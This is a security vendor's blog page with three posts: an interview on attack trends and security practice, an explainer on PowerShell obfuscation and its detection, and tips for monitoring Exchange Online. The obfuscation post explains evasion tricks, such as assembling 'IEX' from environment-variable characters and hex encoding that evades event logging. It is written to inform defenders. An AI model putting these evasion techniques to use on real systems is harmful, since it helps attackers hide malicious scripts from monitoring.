This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Inside Out Security: Today I’m with Ofer Shezaf, who is Varonis’s Cyber Security Director. What does that title mean? Essentially, Ofer’s here to make sure that our products help customers get the best security possible for their systems. Ofer has had a long career in data security and I might add is a graduate of Israel’s amazing Technion University.

Welcome, Ofer.

Ofer Shezaf: Thank you.

IOS: So I’d like to start off by asking you how have attackers and their techniques changed since you started in cyber security?

OS: Well, it does give away the fact that I’ve been here for a while. And the question is also an age-old question, and people will say that it’s an ever-evolving threat and some would say just the same time and time again.

My own opinion is that it’s a mixed bag. Techies would usually say that it’s all the same as usual. Actually, the technical attack vectors tend to be rather the same. So buffer overflows have been with us for probably 40 years, and SQL Injection for the last 20.

Nevertheless, everything around the technical attack vectors does change. And I think that the sophistication and the resources that the dark side is investing — it always amazes me how much it’s always increasing!

When Stuxnet appeared a few years back, targeted, you know, nuclear reactors in Iran, I thought it was just, you know, a game changer. Things will never be the same!

But today it seems to be that every political campaign tends to utilize the same techniques, so it’s amazing how much the bad guys are investing into those hacks. And that changes things.

 

IOS: Do you have any thoughts on the dark web, and now this new trend of actually buying productized malware? Do you think that is changing things?

OS: It certainly does change things. To generalize a bit, I think that the economy behind hacking has evolved a lot. It’s way more of a business and the dark web today is not a dark alley anymore. It’s more like a business arena.

And if you think about it, ransomware, which is a business model to make money out of malware, is using the same technical techniques as malware always did. But today’s dark web, the economical infrastructure of Bitcoin enables it to be a real business, which is where it becomes riskier and more frightening to an extent.

 

IOS:  At Varonis, we have obviously been focusing on … that attackers have had no problem or less problems than in the past of getting inside. And that’s basically through phishing and some other techniques.

So do you think that IT departments have adapted to this new kind of threat environment where the attacker is better able to sort of get in, you know, in through the perimeter, or they have not adapted to these kinds of threats?

OS: So I must say I meet a lot of people working in IT security. And there are some smart guys out there. So they know what it’s about — we are not blind as an industry to the new risks. That said, the hackers are successful which implies that we are missing something! Based on results, we lose.

The question why this sort of misalignment of capabilities and results, is the million-dollar question. My answer is a personal one: we don’t invest enough … I mean, it’s a nine-to-five sort of job to be an IT security, and it tends to be a lot more like policing, like physical security. We need to be into it. I coined the term for that. We need … to do continuous security, as you think the army or military or police would do.

 

IOS: We spoke a little bit before this and you had talked about I guess Security Operation Centers or SOCs. So is that something you think that should be more a part of the security environment?

OS: Yeah. I mentioned continuous security but it’s just a term, and it might be worth sort of thinking about what it actually implies for an organization. So SOCs have been around for a while, Security Operation Centers. But they tend to, well, not take it all the way.

I think that we need to have people sitting there really 24-7 even in smaller organizations because it’s becoming, you know… You have a guard at the door even in smaller organizations. So you need someone in the SOC all the time.

And they don’t need just to react. They need to be proactive.

So they need to hunt, to look for the bad guys, to do rounds around the building if you think about it in physical terms. And if we will do that, if people will invest more time, more thinking …  they’ll also feedback into a technical means which are our primary security tool today.

 

IOS: Ofer, we often see a disconnect between the executive suite and people doing data security on the ground. Maybe that’s just appearing with all the breaches in the last few years. I’m not sure. If there are one or two things you could tell the C-level about corporate data security, what would they be?

OS: So I did mention one, which is how much we invest. I think there’s under-investment and investment, at the end of the day, is in the hands of the executives.

The other thing is rather contradictory maybe but it’s important and that’s the fact that there is no total security … The only system which is entirely secure is a system which has no users and doesn’t operate. So it’s all about risk management. If it’s about risk management, it implies that we have to make choices and it also implies that we will be hacked.

And if we will be hacked, we need to make sure it’s less informed systems and we also have to make sure that we have the right plans for the day after. What will we do when we are hacked?

So things like separating systems that are important, defining what are the business critical systems, those that your stock would drop if they are hacked and those that are peripheral, and important but less.

 

IOS: So we’ve often talked about Privacy by Design on the iOS blog, but the term as you told me is actually is older. It’s really… I mean, that phraseology…that phrase is old. It really comes out of Security by Design which is more of a programming term. And that really means that developers should consider security as they’re developing, as they’re actually making the app.

I was wondering if this approach of Security by Design where we’re actually doing the security from the start will really lessen the likelihood of breaches in the coming years. Or will we need more incentives to get these applications to be more secure?

OS: So we are moving from operational security, which is after systems are put in place and then it will be protected, into designing their security upfront before we start deploying them. So it’s … the other part. I spent many years in applications security, which is right around that.

And I think that the concept of baking in security into the development process makes sense to everyone. It saves on later on because you don’t have to fix things when they’re found, and it also has the benefit of making systems more secure.

That said, it’s not a new concept. I mentioned that Security by Design is term that’s used for a decade-and-a-half. It doesn’t happen enough and the question is why? Why is Security by Design not happening as much as we would like it to be and how to make it better?

And I think that the key to that is that developers are not measured by security! They are measured by how much they output in terms of functionality. Quality is important but it’s measured in terms of failures rather than security breaches. And security is someone else’s problem so it’s not the developer problem or the developing manager problem.

As long as we don’t change that, as long as they don’t think of security as an important goal of the development process, it would be a leftover, something done that is an afterthought.

 

IOS: Well, it sounds like we may need other incentives here. And so for example, I can go to a store and buy a light bulb, and I know it has been certified by some outside agency. In the United States, it’s Underwriters Lab. There are a few others that do that.

Do you think we may see something like that, an outside certification saying that this software meets some minimal security requirements?

OS: So it goes back to compliance versus real security … I think compliance and regulations are important for market deficiencies. So when things do not work because they aren’t the right incentives, so it’s an important starting point.

That said, they are there, they’re just not providing enough. They’re also not, today, targeted specifically at the development phase, and in most cases, they are taken to be part of the operational phase, which is later on.

So it will be an interesting idea to try to create a development process for specific regulations. It’s harder because we make end-result regulations … we don’t make good software requirements!

That said, I’ve once seen an interesting demonstration. Somebody created a label for software, which is like the label you have on food, with the ingredients saying how much, you know, how much SQL injections it might have and how much cross-site scripting it might have, as you would have for sugars and fats …

 

IOS: It is quite an interesting idea! At the blog, we’ve written a lot about pen testing, and actually, we’ve also spoken to a few actual testers. You know, obviously, this is another way to deal with … improving security in an organization. I’m wondering, how do you feel about hiring these outside pen testers?

OS: So first of all, by definition, it’s the opposite of Security by Design. It usually comes in later in the game once the system is ready. So if I said I believe in security by design then pen testing seems to be less important. That said, because Security by Design doesn’t work well, pen testing is needed. It’s very much an educational phase where you bring people in, and they tell you that you didn’t do right.

Why I don’t see this as more than educational?  First, because pen testers usually are given just as much time as was allocated. You know, it’s money at the end of the day, and today the bad guys are just investing more.

It’s not a holistic way to make the software secure, it’s an … opportunistic one, and usually it gets some things, but it doesn’t get all the things … It’s good for education — would show there is an issue  — but it’s not good enough to make sure that we are really secure.

IOS: That’s right

OS: That said, it is important … Two things which are important when you do pen testing. The first one is since pen testers find just some of the issues, make sure that those are used to create a thought process around the larger challenges of the software!

So if they found a cross-site scripting in a specific place, don’t just fix this one, fix all of the cross-site scriptings … or think why your system was not built to overcome cross-site scripting in the first place. Take it [as a]  driver for security by design.

As an anecdote, I once met an organization where a pen tester came in, he found cross-site scripting. He demonstrated it by having the app popping up a “gotcha” dialogue. And two weeks later, the developers came back and said they fixed it. It doesn’t happen anymore, and what they did was just to check for the word “gotcha” in their input and block it, which is…it does happen, unfortunately!

And beyond fixing this …,it would be well if you have pen testing and they found cross-site scripting, fine, think of why your system, in the first place, was not built to handle those across the board.

The second thing that’s very important is pen testing is usually done very late in the development lifecycle. And too many times, there’s just not enough time to fix things. So making it earlier, making part of the, you know, test as models are released rather than last moment, will ensure that more can be fixed before launch … those systems are less vulnerable.

 

IOS: We also know that Microsoft has started addressing some long-standing security gaps … starting with Windows 10. There’s also a Windows 10 S, which is a Microsoft’s special security configuration for 10. I was wondering if you can tell us what 10 S is doing that may help organizations with their security.

OS: So Microsoft 10 S is the whitelisting version. If you think about security, there are two options to secure things and nearly every security system selects one. One of them is to allow everything in general and then try to block what’s dangerous, okay? An anti-virus would be a good example. Install whatever you want to install and then the anti-virus will catch it if it’s a virus.

The second option, whitelisting is always more secure, but always limits functionality more. Windows 10 S takes this approach. It limits installing software, only things that actually come from the Microsoft App Store.

So it’s way more limited, functionality speaking, sort of feels as it is less of a full system. And personally, you know, [as] an IT guy being here for quite a while, it feels too limited for me. But looking at how — you know, my kids are using computers — how, you know, general office workers are using computers, it might be just enough.

So it might be a good choice by Microsoft to create those limited versions that are secure by design because they allow just as much rather than blocking what’s wrong.

IOS: Right. If I understand what you’re saying, it would prevent, let’s say, malware from being loaded because the malware wouldn’t have been signed, so it wouldn’t have been loaded on the actual whitelist of …

OS: It’s not just signed, it’s actually downloaded from Microsoft App Store, so it’s way more … Signing exists to Windows today as it’s the next step.

IOS: So then it would really prevent anything from being…any outside software from being loaded. Okay. And … is there a performance penalty for that?

OS: As far as I know there is no performance penalty. In a way, the same… having more security in this case might actually improve security and stability because unpredicted software is also a challenge for performance and stability. The downside is functionality.

 

IOS: Right. We know from security analysts, hackers and the cybercriminals have targeted executives, they call it, you know, spear phishing or whale phishing and, you know, they have the more valuable information compared to the average employee.

So it will sort of make sense to actually target these people. I was wondering if you think that executives should receive extra security protections or they should take extra precautions in their dealings with, you know, just in their day-to-day work on the computer?

OS: So in a way, you said it all, because we do know that executives are targeted more, so we need to focus on securing them. We do it in the real world … drawing parallels with the physical security world, so it does make sense.  … A lot of our security controls are automated, and when it’s automated, if you invest in detecting that somebody is posing as the user, why stop at executives?

So my take on that would be, make the automated detection systems address any user, but then focus. It still gets to incident response team that has to assess whether it’s the risk is there and what to do. They can prioritize based on the type of the user– executives being one type of sensitive user, by the way. Of course, admins are another type.

IOS: Yeah, I mean, I could almost imagine a, I guess, like a SOC having a special section just focused on executives and perhaps looking at … any kind of notifications or alerts that come up from the, you know, the standard configuration. But actually, digging a little deeper when those things come up with the executives.

OS: Yes, if you think about it, the major challenge of a SOC is handling the flow of alerts. And any means that will enable them to be more efficient in ending alerts, focusing on those that are more critical to the business where the risk is higher, is important. Executives are a very good example.

So just pop up the alerts about the executives to the top of the list, and the analyst gets to them first and he’s doing something reasonable…He is more valuable to the organization.

In fact, so there is no 100% security! Some incidents or alerts would be left.

 

IOS: One last question. Any predictions on hacking trends in the next few years? I mean, are there new techniques on the horizon that we should be paying closer attention to?

OS: Oh, it’s a crystal ball question. It’s always hard. I’m probably wrong, but I’ll say I’ll try.

So the way to look into that, the way to try to predict is that I found out that hacking techniques usually trail changes in the IT technology. Hackers become experts in the new technology only a year or two or even more than that after the technology becomes widespread. In this respect, I think that mobile is the next front.

We all use mobile, but actually, business uses  mobile  … which is  rather new, Salesforce Mobile App. In the last of couple years, we can actually do more work on the mobile device, which means it’s a good target for malware. And I think we’ve seen malware for any mobile, but we still didn’t see financial or enterprise malware as ransom or for mobile, for example, and that will be coming.

IOS: And what about Internet of Things — it is kind of somewhat related to mobile — as a new trend? Are we starting to see some of that?

OS: Yes, it’s an area where we’ve seen two things. First of all, a lot of research, which always comes before actual real-world use. If you look at what researchers are doing today, you know what hackers will do in two or three years!

And after today, we’ve seen mostly a denial-of-service attacks against, you know, Internet of Things devices where they were … taken off the network.

It would be interesting — it would be frightening actually — once the bad guys start to do more innovative damage by taking over devices. You know, cars are a very frightening example, of course, traffic lights, electricity controllers, etc.

That said, the business model is the driving factor. And I still don’t see — unlike, for example, malware for mobile or a malware over on cloud systems — the business model, apart from nation states, around the Internet of Things.

IOS: It’s interesting! So, Ofer, thank you for joining us. This was a really fascinating discussion, and it’s good to get this perspective from someone who’s been in the business for such a long time.

OS: Thank you. My pleasure as well.

PowerShell Obfuscation: Stealth Through Confusion, Part II

PowerShell Obfuscation: Stealth Through Confusion, Part II

This article is part of the series "PowerShell Obfuscation". Check out the rest:

Let’s step back a little from the last post’s exercise in jumbling PowerShell commands. Obfuscating code as a technique to avoid detection by malware and virus scanners (or prevent reverse engineering) is nothing really new. If we go back into the historical records, there’s this (written in Perl).  What’s the big deal, then?

The key change is that hackers can go malware-free by using garden variety PowerShell in practically all phases of an attack. And through obfuscation, this PowerShell-ware then effectively has an invisibility cloak.  And we all know that cloaking devices can give one side a major advantage!

IT security groups have to deal with this new threat.

Windows PowerShell Logging Is Pretty Good!

As it turns out, I was little too quick in my review last time of PowerShell’s logging capabilities, which are enabled in Group Policy Management. I showed an example where I downloaded and executed a PowerShell cmdlet from a remote website:

I was under the impression that PowerShell logging would not show the evil malware embedded in the string that’s downloaded from the web site.

I was mistaken.

If you turn on the PowerShell module logging through GPM, then indeed the remote PowerShell code appears in the log. To refresh memories, I was using PowerShell version 4 and (I believe) the latest Windows Management Framework (WMF), which is supposed to support the more granular logging.

Better PowerShell logging can be enabled in GPM!

It’s a minor point, but it just means that the attackers would obfuscate the initial payload as well.

I was also mistaken in thinking that the obfuscations provided by Invoke-Obfuscation would not appear de-obfuscated in the log. For example, in the last post I tried one of the string obfuscations to produce this:

Essentially, it’s just a concatenation of separate strings that’s assembled together at run-time to form a cmdlet.

For this post, I sampled more of Invoke-Obfuscation’s scrambling options to see how the commandline appears in the Event log.

I tried its string re-order option (below), which takes advantage of some neat tricks in PowerShell.

Notice that first part $env:comspec[4,15,25]? It takes the environment variable $env:comspec and pulls out the 4-, 15-, and 25-th characters to generate “IEX”, the PowerShell alias for Invoke-Expression. The joinoperator takes the array and converts it to a string.

The next part of this PowerShell expression uses the format operator f. If you’ve worked with sprintf-like commands as a programmer, you’ll immediately recognize these capabilities. However, with PowerShell, you can specify the element position in the parameter list that gets pulled in to create the resulting string. So {20}, {5}, {9}, {2} starts assembling yet another Invoke_Expression cmdlet.

Yes, this gets complicated very quickly!

I also let Invoke-Obfuscation select a la carte from its obfuscation menu, and it came up with the following mess:

After trying all these, I checked the Event Viewer to see that with the more powerful logging capabilities now enabled, Windows could see through the fog, and capture the underlying PowerShell:

Heavily obfuscated, but with PowerShell Module logging enabled the underlying cmdlets are available in the log.

Does this mean that PowerShell obfuscation always gets de-obfuscated in the Window Event log, thereby allowing malware detectors to use traditional pattern matching?

The answer is no!

Invoke-Obfuscation also lets you encode PowerShell scripts into raw ASCII, Hex, and, yes, even Binary. And this encoding obfuscation seems to foil the event logging:

The underlying cmdlet represented by this Hex obfuscation was not detected.

Quantifying Confusion

It appears at this point the attackers have the advantage: a cloaking device that lets their scripts appear invisible to defenders or at least makes them very fuzzy.

The talk given at Black Hat that I referenced in the first post also introduced work done by Microsoft’s Lee Holmes – yeah, that guy —  along with Daniel Bohannon and other researchers in detecting obfuscated malware using probabilistic models and machine learning techniques.

If you’re interested you can look at the paper they presented at the conference. Holmes and his team borrowed techniques from natural language processing to analyze character frequency of obfuscated PowerShell scripts versus the benign varieties. There are differences!

Those dribbles below the main trend show that obfuscated PowerShell has a different character frequency than standard scripts.

In any case, Holmes and his group moved to a more complicated logistical regression model – basically classifying PowerShell code into either evil obfuscated or normal scripts. He then trained his logit by looking deep into PowerShell’s parsing of commands – gathering stats for levels of nesting, etc. – to come up with a respectable classifier with an accuracy of about 96%. Not by any means perfect, but a good start!

A Few More Thoughts

While I give a hat tip to Microsoft for improving their PowerShell logging game, there are still enough holes for attackers to get their scripts run without being detected. And this assumes that IT groups know to enable PowerShell Module logging in the first place!

The machine learning model suggests that it’s possible to  detect these stealthy scripts in the wild.

However, this means we’re back into the business of scanning for malware, and we know that this approach ultimately falls short. You can’t keep up with the attackers who are always changing and adjusting their code to fool the detectors.

Where is this leading? Of course, you turn on PowerShell logging as needed and try to keep your scanning software up to date, but in the end you need to have a solid secondary defense, one based on looking for post-exploitation activities involving file accesses of your sensitive data.

Catch what PowerShell log scanners miss! Request a demo today.

3 Tips to Monitor and Secure Exchange Online

3 Tips to Monitor and Secure Exchange Online

Even if you don’t have your sights on the highest office in the country, keeping a tight leash on your emails is now more important than ever.

Email is commonly targeted by hackers as a method of entry into organizations. No matter if your email is hosted by a 3rd party or managed internally, it is imperative to monitor and secure those systems.

Microsoft Exchange Online – part of Microsoft’s Office365 cloud offering – is just like Exchange on-prem but you don’t have to deal with the servers. Microsoft provides some tools and reports to assist securing and monitoring of Exchange Online like encryption and archival, but it doesn’t cover all the things that keep you up at night like:

  • What happens when a hacker gains access as an owner to an account?
  • What happens if a hacker elevates permissions and makes themselves owner of the CEO’s email?
  • What happens when the hackers have access to make changes to the O365 environment, will you notice?

These questions are exactly what prompted us to develop our layered security approach – which Andy does a great job explaining the major principles of here. What happens when the bad people get in – and they have the ability to change and move around the system? At the end of the day, Exchange Online is another system that provides an attack vector for hackers.

Applying these same principles to Exchange Online, we can extrapolate the following to implement monitoring and security for your email in the cloud:

  1. Lock down access: Make sure only the correct people are owners of mailboxes, and limit access make changes to permissions or 0365 to a small group of administrators.
  2. Manage user access: Archive and delete inactive users immediately. Inactive users are an easy target for hackers as they are usually able to use those accounts without being noticed.
  3. Monitor behavior: Implement a User Based Analytics (UBA) system on top of your email monitoring. Being able to spot abnormal behavior (ie an account being promoted to owner of the CEO’s email folder, another forwarding thousands of emails to the same email address) early is the key to stopping a hacker in hours or days instead of weeks or months.

Wondering if there’s a good solution to help monitor your Exchange Online? Well, we’ve got you covered there too.